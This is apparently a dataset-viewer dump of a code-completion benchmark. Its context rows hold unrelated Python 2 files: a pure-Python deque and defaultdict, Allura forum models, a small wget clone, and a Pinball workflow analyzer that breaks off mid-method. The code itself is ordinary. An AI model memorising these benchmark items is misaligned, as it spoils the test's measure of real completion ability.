gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""High performance data structures
"""
#
# Copied and completed from the sandbox of CPython
# (nondist/sandbox/collections/pydeque.py rev 1.1, Raymond Hettinger)
#
# Note that PyPy also contains a built-in module '_collections' which will hide
# this one if compiled in.
# try:
# from threading import _get_ident as _thread_ident
# except ImportError:
# def _thread_ident():
# return -1
import thread
_thread_ident = thread.get_ident
# Block layout: each storage block is a plain list of BLOCKSIZ slots.
# Slots 0..n-1 hold data; slot n (LFTLNK) links to the previous block and
# slot n+1 (RGTLNK) links to the next one.
n = 30
LFTLNK = n
RGTLNK = n+1
BLOCKSIZ = n+2
# The deque's size limit is d.maxlen. The limit can be zero or positive, or
# None. After an item is added to a deque, we check to see if the size has
# grown past the limit. If it has, we get the size back down to the limit by
# popping an item off of the opposite end. The methods that can trigger this
# are append(), appendleft(), extend(), and extendleft().
class deque(object):
    """Pure-Python double-ended queue.

    Storage is a doubly-linked list of fixed-size blocks (lists of
    BLOCKSIZ slots); LFTLNK/RGTLNK slots of each block hold the links to
    the neighbouring blocks.  ``state`` is a mutation counter used by
    iterators to detect concurrent modification.
    """
    def __new__(cls, iterable=(), *args, **kw):
        # clear() here (not only in __init__) so subclasses that skip
        # deque.__init__ still get a consistent empty structure.
        self = super(deque, cls).__new__(cls)
        self.clear()
        return self
    def __init__(self, iterable=(), maxlen=None):
        self.clear()
        if maxlen is not None:
            if maxlen < 0:
                raise ValueError("maxlen must be non-negative")
        self._maxlen = maxlen
        add = self.append
        for elem in iterable:
            add(elem)
    # @property
    def maxlen(self):
        # Read-only size bound (None means unbounded).
        return self._maxlen
    # TODO: Make this a decorator once they're implemented.
    maxlen = property(maxlen)
    def clear(self):
        """Make the deque empty: one block with both indexes centred."""
        self.right = self.left = [None] * BLOCKSIZ
        self.rightndx = n//2 # points to last written element
        self.leftndx = n//2+1
        self.length = 0
        self.state = 0
    def append(self, x):
        """Add x to the right side, evicting from the left if over maxlen."""
        self.state += 1
        self.rightndx += 1
        if self.rightndx == n:
            # Right block full: link in a fresh block on the right.
            newblock = [None] * BLOCKSIZ
            self.right[RGTLNK] = newblock
            newblock[LFTLNK] = self.right
            self.right = newblock
            self.rightndx = 0
        self.length += 1
        self.right[self.rightndx] = x
        if self.maxlen is not None and self.length > self.maxlen:
            self.popleft()
    def appendleft(self, x):
        """Add x to the left side, evicting from the right if over maxlen."""
        self.state += 1
        self.leftndx -= 1
        if self.leftndx == -1:
            # Left block full: link in a fresh block on the left.
            newblock = [None] * BLOCKSIZ
            self.left[LFTLNK] = newblock
            newblock[RGTLNK] = self.left
            self.left = newblock
            self.leftndx = n-1
        self.length += 1
        self.left[self.leftndx] = x
        if self.maxlen is not None and self.length > self.maxlen:
            self.pop()
    def extend(self, iterable):
        """Append every element of iterable on the right."""
        if iterable is self:
            # Snapshot first so extending with ourselves terminates.
            iterable = list(iterable)
        for elem in iterable:
            self.append(elem)
    def extendleft(self, iterable):
        """Append every element of iterable on the left (reverses order)."""
        if iterable is self:
            iterable = list(iterable)
        for elem in iterable:
            self.appendleft(elem)
    def pop(self):
        """Remove and return the rightmost element."""
        if self.left is self.right and self.leftndx > self.rightndx:
            raise IndexError("pop from an empty deque")
        x = self.right[self.rightndx]
        self.right[self.rightndx] = None  # drop the reference for the GC
        self.length -= 1
        self.rightndx -= 1
        self.state += 1
        if self.rightndx == -1:
            prevblock = self.right[LFTLNK]
            if prevblock is None:
                # the deque has become empty; recenter instead of freeing block
                self.rightndx = n//2
                self.leftndx = n//2+1
            else:
                prevblock[RGTLNK] = None
                self.right[LFTLNK] = None
                self.right = prevblock
                self.rightndx = n-1
        return x
    def popleft(self):
        """Remove and return the leftmost element."""
        if self.left is self.right and self.leftndx > self.rightndx:
            raise IndexError("pop from an empty deque")
        x = self.left[self.leftndx]
        self.left[self.leftndx] = None  # drop the reference for the GC
        self.length -= 1
        self.leftndx += 1
        self.state += 1
        if self.leftndx == n:
            prevblock = self.left[RGTLNK]
            if prevblock is None:
                # the deque has become empty; recenter instead of freeing block
                self.rightndx = n//2
                self.leftndx = n//2+1
            else:
                prevblock[LFTLNK] = None
                self.left[RGTLNK] = None
                self.left = prevblock
                self.leftndx = 0
        return x
    def count(self, value):
        """Return the number of elements equal to value."""
        c = 0
        for item in self:
            if item == value:
                c += 1
        return c
    def remove(self, value):
        # Need to defend mutating or failing comparisons
        # Strategy: rotate one step left per probe so the probed element is
        # always self[0]; the finally clause rotates back by however many
        # steps were actually taken, even if a comparison raised.
        i = 0
        try:
            for i in range(len(self)):
                if self[0] == value:
                    self.popleft()
                    return
                self.append(self.popleft())
                # Bump i so the finally clause also undoes this last step
                # when the loop falls through without finding the value.
                i += 1
            raise ValueError("deque.remove(x): x not in deque")
        finally:
            self.rotate(i)
    def rotate(self, n=1):
        """Rotate n steps to the right (negative n rotates left)."""
        length = len(self)
        if length <= 1:
            return
        halflen = length >> 1
        # Normalise n so we never walk more than half the deque.
        if n > halflen or n < -halflen:
            n %= length
            if n > halflen:
                n -= length
            elif n < -halflen:
                n += length
        while n > 0:
            self.appendleft(self.pop())
            n -= 1
        while n < 0:
            self.append(self.popleft())
            n += 1
    def reverse(self):
        "reverse *IN PLACE*"
        leftblock = self.left
        rightblock = self.right
        leftindex = self.leftndx
        rightindex = self.rightndx
        for i in range(self.length // 2):
            # Validate that pointers haven't met in the middle
            assert leftblock != rightblock or leftindex < rightindex
            # Swap
            (rightblock[rightindex], leftblock[leftindex]) = (
                leftblock[leftindex], rightblock[rightindex])
            # Advance left block/index pair
            leftindex += 1
            if leftindex == n:
                leftblock = leftblock[RGTLNK]
                assert leftblock is not None
                leftindex = 0
            # Step backwards with the right block/index pair
            rightindex -= 1
            if rightindex == -1:
                rightblock = rightblock[LFTLNK]
                assert rightblock is not None
                rightindex = n - 1
    def __repr__(self):
        # A per-thread marker attribute guards against infinite recursion
        # when the deque (directly or indirectly) contains itself.
        threadlocalattr = '__repr' + str(_thread_ident())
        if threadlocalattr in self.__dict__:
            return 'deque([...])'
        else:
            self.__dict__[threadlocalattr] = True
            try:
                if self.maxlen is not None:
                    return 'deque(%r, maxlen=%s)' % (list(self), self.maxlen)
                else:
                    return 'deque(%r)' % (list(self),)
            finally:
                del self.__dict__[threadlocalattr]
    def __iter__(self):
        return deque_iterator(self, self._iter_impl)
    def _iter_impl(self, original_state, giveup):
        # Generator walking blocks left-to-right; giveup() is invoked when
        # the state counter shows a mutation happened during iteration.
        if self.state != original_state:
            giveup()
        block = self.left
        while block:
            l, r = 0, n
            if block is self.left:
                l = self.leftndx
            if block is self.right:
                r = self.rightndx + 1
            for elem in block[l:r]:
                yield elem
                if self.state != original_state:
                    giveup()
            block = block[RGTLNK]
    def __reversed__(self):
        return deque_iterator(self, self._reversed_impl)
    def _reversed_impl(self, original_state, giveup):
        # Mirror image of _iter_impl: walk blocks right-to-left.
        if self.state != original_state:
            giveup()
        block = self.right
        while block:
            l, r = 0, n
            if block is self.left:
                l = self.leftndx
            if block is self.right:
                r = self.rightndx + 1
            for elem in reversed(block[l:r]):
                yield elem
                if self.state != original_state:
                    giveup()
            block = block[LFTLNK]
    def __len__(self):
        #sum = 0
        #block = self.left
        #while block:
        #    sum += n
        #    block = block[RGTLNK]
        #return sum + self.rightndx - self.leftndx + 1 - n
        return self.length
    def __getref(self, index):
        """Return (block, slot) holding deque index; index may be negative."""
        if index >= 0:
            # Scan blocks left-to-right, narrowing by each block's span.
            block = self.left
            while block:
                l, r = 0, n
                if block is self.left:
                    l = self.leftndx
                if block is self.right:
                    r = self.rightndx + 1
                span = r-l
                if index < span:
                    return block, l+index
                index -= span
                block = block[RGTLNK]
        else:
            # Negative index: scan right-to-left using negative spans.
            block = self.right
            while block:
                l, r = 0, n
                if block is self.left:
                    l = self.leftndx
                if block is self.right:
                    r = self.rightndx + 1
                negative_span = l-r
                if index >= negative_span:
                    return block, r+index
                index -= negative_span
                block = block[LFTLNK]
        raise IndexError("deque index out of range")
    def __getitem__(self, index):
        block, index = self.__getref(index)
        return block[index]
    def __setitem__(self, index, value):
        block, index = self.__getref(index)
        block[index] = value
    def __delitem__(self, index):
        """Delete the element at index by rotating it to an end."""
        length = len(self)
        if index >= 0:
            if index >= length:
                raise IndexError("deque index out of range")
            self.rotate(-index)
            self.popleft()
            self.rotate(index)
        else:
            # ~index == -index - 1: offset of the element from the right end.
            index = ~index
            if index >= length:
                raise IndexError("deque index out of range")
            self.rotate(index)
            self.pop()
            self.rotate(-index)
    def __reduce_ex__(self, proto):
        # Pickle as (class, (contents, maxlen)).
        return type(self), (list(self), self.maxlen)
    __hash__ = None  # mutable, therefore unhashable
    def __copy__(self):
        return self.__class__(self, self.maxlen)
    # XXX make comparison more efficient
    def __eq__(self, other):
        if isinstance(other, deque):
            return list(self) == list(other)
        else:
            return NotImplemented
    def __ne__(self, other):
        if isinstance(other, deque):
            return list(self) != list(other)
        else:
            return NotImplemented
    def __lt__(self, other):
        if isinstance(other, deque):
            return list(self) < list(other)
        else:
            return NotImplemented
    def __le__(self, other):
        if isinstance(other, deque):
            return list(self) <= list(other)
        else:
            return NotImplemented
    def __gt__(self, other):
        if isinstance(other, deque):
            return list(self) > list(other)
        else:
            return NotImplemented
    def __ge__(self, other):
        if isinstance(other, deque):
            return list(self) >= list(other)
        else:
            return NotImplemented
    def __iadd__(self, other):
        self.extend(other)
        return self
class deque_iterator(object):
    # Iterates via a generator produced by itergen (deque._iter_impl or
    # deque._reversed_impl); that generator calls giveup() -- which raises
    # RuntimeError -- when the deque's state counter changes mid-iteration.
    def __init__(self, deq, itergen):
        # Best-effort count of items still to be yielded (length hint).
        self.counter = len(deq)
        def giveup():
            # Zero the counter first so the iterator looks exhausted even
            # if the caller catches the RuntimeError.
            self.counter = 0
            raise RuntimeError("deque mutated during iteration")
        self._gen = itergen(deq.state, giveup)
    def next(self):
        # Python 2 iterator protocol.
        res = next(self._gen)
        self.counter -= 1
        return res
    def __iter__(self):
        return self
class defaultdict(dict):
    """Pure-Python stand-in for collections.defaultdict.

    A dict subclass whose ``__missing__`` hook consults
    ``default_factory`` to fabricate values for absent keys.
    """
    def __init__(self, *args, **kwds):
        # First positional argument, if any, is the factory; the rest are
        # forwarded verbatim to the underlying dict constructor.
        if args:
            default_factory = args[0]
            args = args[1:]
            if default_factory is not None and not callable(default_factory):
                raise TypeError("first argument must be callable")
        else:
            default_factory = None
        self.default_factory = default_factory
        super(defaultdict, self).__init__(*args, **kwds)
    def __missing__(self, key):
        # from defaultdict docs
        factory = self.default_factory
        if factory is None:
            raise KeyError(key)
        value = factory()
        self[key] = value
        return value
    def __repr__(self, recurse=set()):
        # The shared default set is deliberate: it persists across calls
        # and guards against infinite recursion on self-referencing dicts.
        me = id(self)
        if me in recurse:
            return "defaultdict(...)"
        recurse.add(me)
        try:
            return "defaultdict(%s, %s)" % (repr(self.default_factory),
                                            super(defaultdict, self).__repr__())
        finally:
            recurse.remove(me)
    def copy(self):
        # Shallow copy that preserves both the factory and the subclass.
        return type(self)(self.default_factory, self)
    def __copy__(self):
        return self.copy()
    def __reduce__(self):
        """
        __reduce__ must return a 5-tuple as follows:
        - factory function
        - tuple of args for the factory function
        - additional state (here None)
        - sequence iterator (here None)
        - dictionary iterator (yielding successive (key, value) pairs
        This API is used by pickle.py and copy.py.
        """
        return (type(self), (self.default_factory,), None, None, self.iteritems())
| |
import re
import logging
from itertools import chain
from ming import schema
from ming.utils import LazyProperty
from ming.orm import FieldProperty, RelationProperty, ForeignIdProperty, Mapper
from allura import model as M
from allura.lib import utils
from allura.lib import helpers as h
# common_suffix resolves to the 'forgemail.domain' config value; it is the
# mail-domain suffix appended to per-forum email addresses below.
config = utils.ConfigProxy(
    common_suffix='forgemail.domain')
log = logging.getLogger(__name__)
class Forum(M.Discussion):
    """A discussion forum; forums can be nested via parent_id."""
    class __mongometa__:
        name='forum'
    type_s = 'Discussion'
    # _id of the parent Forum, or None for a top-level forum.
    parent_id = FieldProperty(schema.ObjectId, if_missing=None)
    threads = RelationProperty('ForumThread')
    posts = RelationProperty('ForumPost')
    members_only = FieldProperty(bool, if_missing=False)
    anon_posts = FieldProperty(bool, if_missing=False)
    monitoring_email = FieldProperty(str, if_missing=None)
    @classmethod
    def attachment_class(cls):
        return ForumAttachment
    @classmethod
    def thread_class(cls):
        return ForumThread
    # NOTE: deliberately shadows the RelationProperty 'threads' above so the
    # result is ordered: announcements first, then sticky, then the rest.
    @LazyProperty
    def threads(self):
        threads = self.thread_class().query.find(dict(discussion_id=self._id)).all()
        sorted_threads = chain(
            (t for t in threads if 'Announcement' in t.flags),
            (t for t in threads if 'Sticky' in t.flags and 'Announcement' not in t.flags),
            (t for t in threads if 'Sticky' not in t.flags and 'Announcement' not in t.flags))
        return list(sorted_threads)
    @property
    def parent(self):
        return Forum.query.get(_id=self.parent_id)
    @property
    def subforums(self):
        return Forum.query.find(dict(parent_id=self._id)).all()
    @property
    def email_address(self):
        # Reversed app URL path (slashes -> dots) forms the mail domain part.
        domain = '.'.join(reversed(self.app.url[1:-1].split('/'))).replace('_', '-')
        return '%s@%s%s' % (self.shortname.replace('/', '.'), domain, config.common_suffix)
    @LazyProperty
    def announcements(self):
        return self.thread_class().query.find(dict(
            app_config_id=self.app_config_id,
            flags='Announcement')).all()
    def breadcrumbs(self):
        """Return [(name, url), ...] from the root forum down to this one."""
        if self.parent:
            l = self.parent.breadcrumbs()
        else:
            l = []
        return l + [(self.name, self.url())]
    def url(self):
        return h.urlquote(self.app.url + self.shortname + '/')
    def delete(self):
        # Delete the subforums
        for sf in self.subforums:
            sf.delete()
        super(Forum, self).delete()
    def get_discussion_thread(self, data=None):
        """Find (or create) the thread an incoming message belongs to.

        Returns (thread, parent_post_id); parent_post_id is non-None only
        when the message is a reply to an existing post.
        """
        # If the data is a reply, use the parent's thread
        subject = '[no subject]'
        parent_id = None
        if data is not None:
            in_reply_to = data.get('in_reply_to')
            if in_reply_to:
                # The post id is the last path segment of the reference.
                parent_id = in_reply_to[0].split('/')[-1]
            else:
                parent_id = None
            message_id = data.get('message_id') or ''
            subject = data['headers'].get('Subject', subject)
            if parent_id is not None:
                parent = self.post_class().query.get(_id=parent_id)
                if parent: return parent.thread, parent_id
            if message_id:
                post = self.post_class().query.get(_id=message_id)
                if post: return post.thread, None
        # Otherwise it's a new thread
        return self.thread_class()(discussion_id=self._id,subject=subject), None
    @property
    def discussion_thread(self):
        # A Forum has no single discussion thread of its own.
        return None
    @property
    def icon(self):
        return ForumFile.query.get(forum_id=self._id)
class ForumFile(M.File):
    # File storage tied to a single forum (used for the forum icon).
    forum_id=FieldProperty(schema.ObjectId)
class ForumThread(M.Thread):
    """A thread of ForumPosts within a Forum."""
    class __mongometa__:
        name='forum_thread'
        indexes = [
            'flags',
            'discussion_id',
            'import_id', # may be used by external legacy systems
        ]
    type_s = 'Thread'
    discussion_id = ForeignIdProperty(Forum)
    first_post_id = ForeignIdProperty('ForumPost')
    # e.g. 'Announcement', 'Sticky' -- drives ordering in Forum.threads.
    flags = FieldProperty([str])
    discussion = RelationProperty(Forum)
    posts = RelationProperty('ForumPost')
    first_post = RelationProperty('ForumPost', via='first_post_id')
    @property
    def status(self):
        # A thread's moderation status mirrors that of its first post.
        if self.first_post:
            return self.first_post.status
        else:
            return 'ok'
    @classmethod
    def attachment_class(cls):
        return ForumAttachment
    @property
    def email_address(self):
        return self.discussion.email_address
    def primary(self):
        return self
    def post(self, subject, text, message_id=None, parent_id=None, **kw):
        # 'subject' is accepted for interface compatibility; the parent
        # implementation is not given it here.
        post = super(ForumThread, self).post(text, message_id=message_id, parent_id=parent_id, **kw)
        if not self.first_post_id:
            # First post in the thread: remember it and seed the reply count.
            self.first_post_id = post._id
            self.num_replies = 1
        h.log_action(log, 'posted').info('')
        return post
    def set_forum(self, new_forum):
        """Re-home this thread (its posts and attachments) under new_forum."""
        self.post_class().query.update(
            dict(discussion_id=self.discussion_id, thread_id=self._id),
            {'$set':dict(discussion_id=new_forum._id)}, multi=True)
        self.attachment_class().query.update(
            {'discussion_id':self.discussion_id, 'thread_id':self._id},
            {'$set':dict(discussion_id=new_forum._id)})
        self.discussion_id = new_forum._id
class ForumPostHistory(M.PostHistory):
    # Version-history records for ForumPost edits.
    class __mongometa__:
        name='post_history'
    artifact_id = ForeignIdProperty('ForumPost')
class ForumPost(M.Post):
    """A single post within a ForumThread."""
    class __mongometa__:
        name='forum_post'
        history_class = ForumPostHistory
    type_s = 'Post'
    discussion_id = ForeignIdProperty(Forum)
    thread_id = ForeignIdProperty(ForumThread)
    discussion = RelationProperty(Forum)
    thread = RelationProperty(ForumThread)
    @classmethod
    def attachment_class(cls):
        return ForumAttachment
    @property
    def email_address(self):
        return self.discussion.email_address
    def primary(self):
        return self
    def promote(self):
        '''Make the post its own thread head'''
        thd = self.thread_class()(
            discussion_id=self.discussion_id,
            subject=self.subject,
            first_post_id=self._id)
        self.move(thd, None)
        return thd
    def move(self, thread, new_parent_id):
        """Move this post and its reply subtree into *thread*.

        Leaves an approved placeholder post at the old location, rewrites
        the slug/full_slug of this post and every reply, and re-homes the
        attachments of the whole subtree.
        """
        # Add a placeholder to note the move
        placeholder = self.thread.post(
            subject='Discussion moved',
            text='',
            parent_id=self.parent_id)
        placeholder.slug = self.slug
        placeholder.full_slug = self.full_slug
        placeholder.approve()
        if new_parent_id:
            parent = self.post_class().query.get(_id=new_parent_id)
        else:
            parent = None
        # Set the thread ID on my replies and attachments
        old_slug = self.slug + '/', self.full_slug + '/'
        reply_re = re.compile(self.slug + '/.*')
        self.slug, self.full_slug = self.make_slugs(parent=parent, timestamp=self.timestamp)
        placeholder.text = 'Discussion moved to [here](%s#post-%s)' % (
            thread.url(), self.slug)
        new_slug = self.slug + '/', self.full_slug + '/'
        self.discussion_id=thread.discussion_id
        self.thread_id=thread._id
        self.parent_id=new_parent_id
        self.text = 'Discussion moved from [here](%s#post-%s)\n\n%s' % (
            placeholder.thread.url(), placeholder.slug, self.text)
        reply_tree = self.query.find(dict(slug=reply_re)).all()
        for post in reply_tree:
            post.slug = new_slug[0] + post.slug[len(old_slug[0]):]
            # BUG FIX: this previously rebuilt full_slug from post.slug
            # (already rewritten on the line above), corrupting the
            # timestamped ordering key; derive it from the old full_slug.
            post.full_slug = new_slug[1] + post.full_slug[len(old_slug[1]):]
            post.discussion_id=self.discussion_id
            post.thread_id=self.thread_id
        for post in [ self ] + reply_tree:
            for att in post.attachments:
                att.discussion_id=self.discussion_id
                att.thread_id=self.thread_id
class ForumAttachment(M.DiscussionAttachment):
    # Binds the generic discussion-attachment machinery to the forum models.
    DiscussionClass=Forum
    ThreadClass=ForumThread
    PostClass=ForumPost
    class __mongometa__:
        polymorphic_identity='ForumAttachment'
    attachment_type=FieldProperty(str, if_missing='ForumAttachment')
Mapper.compile_all()
| |
import re
import sys
import time
import socket
import urllib2
def is_valid_ip(addr):
    """
    Thanks to @Markus Jarderot on Stack Overflow
    http://stackoverflow.com/a/319293

    True when *addr* parses as either an IPv4 or an IPv6 literal.
    """
    if is_valid_ipv4(addr):
        return True
    return is_valid_ipv6(addr)
def is_valid_ipv4(addr):
    """
    Thanks to @Markus Jarderot on Stack Overflow
    http://stackoverflow.com/a/319293

    Accepts dotted decimal/hex/octal quads as well as the flat decimal,
    hexadecimal and octal notations.  Returns a bool.
    """
    ipv4_re = re.compile(r"""
    ^
    (?:
      # Dotted variants:
      (?:
        # Decimal 1-255 (no leading 0's)
        [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
      |
        0x0*[0-9a-f]{1,2} # Hex 0x0 - 0xFF (possible leading 0's)
      |
        0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
      )
      (?: # Repeat 0-3 times, separated by a dot
        \.
        (?:
          [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
        |
          0x0*[0-9a-f]{1,2}
        |
          0+[1-3]?[0-7]{0,2}
        )
      ){0,3}
    |
      0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
    |
      0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
    |
      # Decimal notation, 1-4294967295:
      429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
      42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
      4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
    )
    $
    """, re.VERBOSE | re.IGNORECASE)
    match = ipv4_re.match(addr)
    return match is not None
def is_valid_ipv6(addr):
    """
    Thanks to @Markus Jarderot on Stack Overflow
    http://stackoverflow.com/a/319293

    Accepts full and '::'-compressed forms, optionally ending in an
    embedded dotted-quad IPv4 tail.  Returns a bool.
    """
    ipv6_re = re.compile(r"""
    ^
    \s* # Leading whitespace
    (?!.*::.*::) # Only a single whildcard allowed
    (?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
    (?: # Repeat 6 times:
    [0-9a-f]{0,4} # A group of at most 4 hexadecimal digits
    (?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
    ){6} #
    (?: # Either
    [0-9a-f]{0,4} # Another group
    (?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
    [0-9a-f]{0,4} # Last group
    (?: (?<=::) # Colon iff preceeded by exacly one colon
    | (?<!:) #
    | (?<=:) (?<!::) : #
    ) # OR
    | # A v4 address with NO leading zeros
    (?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
    (?: \.
    (?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
    ){3}
    )
    \s* # Trailing whitespace
    $
    """, re.VERBOSE | re.IGNORECASE | re.DOTALL)
    match = ipv6_re.match(addr)
    return match is not None
def ip_is_resolvable(ip_addr):
    """Reverse-DNS lookup helper.

    Returns the (hostname, aliaslist, ipaddrlist) triple from
    socket.gethostbyaddr on success, or None when the address cannot be
    resolved.  NOTE(review): callers also pass hostnames, not just IPs.
    """
    try:
        return socket.gethostbyaddr(ip_addr)
    except (socket.herror, socket.gaierror):
        return None
def chunk_report(bytes_so_far, chunk_size, total_size):
    """Print a wget-style progress bar (Python 2).

    Renders '[=====>     ] NN% bytes' on one line; the carriage return in
    the format string makes each call overwrite the previous output.
    """
    percent = float(bytes_so_far) / total_size
    if percent:
        equals = '=' * int(percent * 39)
    else:
        equals = ''
    equals += '>'
    space = ' ' * (39 - len(equals))
    percentage = '[%s%s] ' % (equals, space)
    str_percent = str(int(percent * 100)) + '%'
    text = "{:<4}{} {:,}\r".format(str_percent, percentage, bytes_so_far)
    # slick way to print text on a single line repeatedly
    print text,
    if bytes_so_far >= total_size:
        print '\n'
def chunk_read(response, chunk_size=8192, report_hook=None):
    """Drain *response* in chunk_size pieces and return the byte count.

    After each non-empty chunk, ``report_hook(bytes_so_far, chunk_size,
    total_size)`` is invoked when a hook was supplied.
    NOTE(review): assumes the server sent a Content-Length header.
    """
    header = response.info().getheader('Content-Length')
    total_size = int(header.strip())
    downloaded = 0
    chunk = response.read(chunk_size)
    while chunk:
        downloaded += len(chunk)
        if report_hook:
            report_hook(downloaded, chunk_size, total_size)
        chunk = response.read(chunk_size)
    return downloaded
def num_fmt(num):
    """Format a byte count as a short human-readable size string.

    Returns e.g. '2.0K', '5.0M', '3.0G' or '1.5T', or None for anything
    smaller than one kilobyte (the caller then prints the raw byte count).
    """
    # ignore anything smaller than a kilobyte
    num /= 1024.0
    # BUG FIX: this used to compare against 1024.0, which made everything
    # below one *megabyte* (not one kilobyte) return None, so KB-sized
    # downloads never got a human-readable size.
    if num < 1.0:
        return None
    for x in ['K', 'M', 'G']:
        if num < 1024.0:
            return "%3.1f%s" % (num, x)
        num /= 1024.0
    return "%3.1f%s" % (num, 'T')
def wget(args):
    """Tiny wget clone (Python 2): fetch args[0] over HTTP and save it.

    Mimics GNU wget's resolve/connect/progress output.
    NOTE(review): the reported download speed is hard-coded, and the bare
    except around urlopen hides the real failure reason -- both look like
    placeholders to tighten up.
    """
    url = args[0]
    # Host portion as typed (before any scheme is prepended).
    url_s = url.split('/')[0]
    if not '://' in url:
        url = 'http://' + url
    # NOTE(review): '%e' (space-padded day) is platform-dependent and is
    # inconsistent with the '%d' used for the completion timestamp below.
    localtime = str(time.strftime('%Y-%m-%e %H:%M:%S', time.localtime()))
    print '--%s-- %s' % (localtime, url)
    # NOTE(review): url has the scheme prepended by now, so this check can
    # never match; it presumably should test url_s instead -- confirm.
    if is_valid_ip(url):
        host = url_s
    else:
        host = url_s + ' (%s)' % url_s
    sys.stdout.write('Resolving %s... ' % host)
    addr = ip_is_resolvable(url_s)
    if not addr:
        print 'failed: Name or service not known.'
        print 'wget: unable to resolve host address `%s\'' % url_s
        return
    else:
        # addr is the (hostname, aliases, ipaddrlist) gethostbyaddr triple.
        print addr[2][0]
        host = host + '|%s|:80' % addr[2][0]
    sys.stdout.write('Connecting to %s... ' % host)
    try:
        connection = urllib2.urlopen(url)
    except: # make this smarter
        print 'failed.'
        return
    print 'connected.'
    print 'HTTP request sent, awaiting response... %s %s' % \
        (connection.code, connection.msg)
    ddl_size = connection.info().getheader('content-length')
    size_fmt = num_fmt(int(ddl_size))
    if size_fmt:
        text = 'Length: %s (%s) [%s]' % (ddl_size, num_fmt(int(ddl_size)),
                                         connection.info().type)
    else:
        text = 'Length: %s [%s]' % (ddl_size, connection.info().type)
    print text
    # Prefer the server-suggested filename; fall back to the URL path,
    # then to index.html for bare directory URLs.
    ddl_file = connection.info().getheader('content-disposition')
    if not ddl_file:
        ddl_file = urllib2.urlparse.urlsplit(url)[2].split('/')
        ddl_file = ddl_file[len(ddl_file) - 1]
    if not ddl_file:
        ddl_file = 'index.html'
    print "Saving to: '%s'\n" % ddl_file
    localtime = str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()))
    # NOTE(review): hard-coded placeholder; no timing is actually done.
    speed = '6.59 MB/s'
    chunk_read(connection, report_hook=chunk_report)
    print "%s (%s) - '%s' saved [%s/%s]" % (localtime, speed, ddl_file,
                                            ddl_size, ddl_size)
    print ''
# for testing
# wget(['www.csl.mtu.edu/~mareid/files/echo.sh'])
| |
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Analyzer allows to manipulate workflow instance tokens.
Only archived workflow instances can be analyzed. Tokens of an archived
workflow instance are immutable so we don't need to worry that the workflow
state will change while we manipulate the graph.
"""
import pickle
from pinball.config.pinball_config import PinballConfig
from pinball.master.thrift_lib.ttypes import Query
from pinball.master.thrift_lib.ttypes import QueryRequest
from pinball.master.thrift_lib.ttypes import Token
from pinball.parser.config_parser import ParserCaller
from pinball.parser.utils import load_parser_with_caller
from pinball.workflow.name import Name
from pinball.workflow.event import Event
from pinball.workflow.utils import load_path
__author__ = 'Pawel Garbacki, Mao Ye'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
class Analyzer(object):
    """Manipulates job and event tokens of a single workflow instance.

    Tokens are loaded through one of the from_* factory methods, mutated
    in place (poisoning, instance change, history clearing) and exported
    again through get_tokens().
    """
    def __init__(self, workflow, instance):
        self._workflow = workflow
        self._instance = instance
        # job name -> unpickled job object
        self._jobs = {}
        # event token name -> event already present in the source tokens
        self._existing_events = {}
        # event token name -> Event synthesized by this analyzer
        self._new_events = {}
        # job name -> priority of the token the job was read from
        self._job_priorities = {}
    @staticmethod
    def from_store(store, workflow, instance):
        """Construct analyzer from tokens in a store.
        Args:
            store: The store to read tokens from.
            workflow: The workflow whose tokens should be read.
            instance: The instance whose tokens should be read.
        Returns:
            Analyzer initialized with tokens read from the store.
        """
        analyzer = Analyzer(workflow, instance)
        analyzer._read_tokens_from_store(store)
        return analyzer
    @staticmethod
    def from_parser_params(workflow):
        """Construct analyzer from tokens of a workflow according
        to the parser params configuration.
        Args:
            workflow: The workflow whose tokens should be read.
        Returns:
            Analyzer initialized with tokens read from the config.
        """
        analyzer = Analyzer(workflow, None)
        analyzer._read_tokens_from_parser_params()
        return analyzer
    @staticmethod
    def from_client(client, workflow, instance):
        """Construct analyzer from tokens of a workflow in the master.
        Args:
            client: The client connected to the master.
            workflow: The workflow whose tokens should be read.
            instance: The instance whose tokens should be read.
        Returns:
            Analyzer initialized with tokens read from the client.
        """
        analyzer = Analyzer(workflow, instance)
        analyzer._read_tokens_from_client(client)
        return analyzer
    def _filter_job_tokens(self, tokens):
        """Filter out all tokens which are not job tokens.
        Args:
            tokens: The tokens to filter.
        """
        for token in tokens:
            name = Name.from_job_token_name(token.name)
            # Infer the instance from the first token that names one.
            if not self._instance and name.instance:
                self._instance = name.instance
            if name.job:
                # NOTE(review): token.data is unpickled here; this is only
                # safe because tokens come from the trusted store/master.
                job = pickle.loads(token.data)
                self._jobs[job.name] = job
                self._job_priorities[job.name] = token.priority
    def _filter_event_tokens(self, tokens):
        """Filter out all tokens which are not event tokens.
        Args:
            tokens: The tokens to filter.
        """
        for token in tokens:
            name = Name.from_event_token_name(token.name)
            if not self._instance and name.instance:
                self._instance = name.instance
            if name.event:
                event = pickle.loads(token.data)
                self._existing_events[token.name] = event
    def _read_tokens_from_store(self, store):
        """Read archived job tokens from the store.
        Args:
            store: The store to read tokens from.
        """
        name = Name(workflow=self._workflow, instance=self._instance)
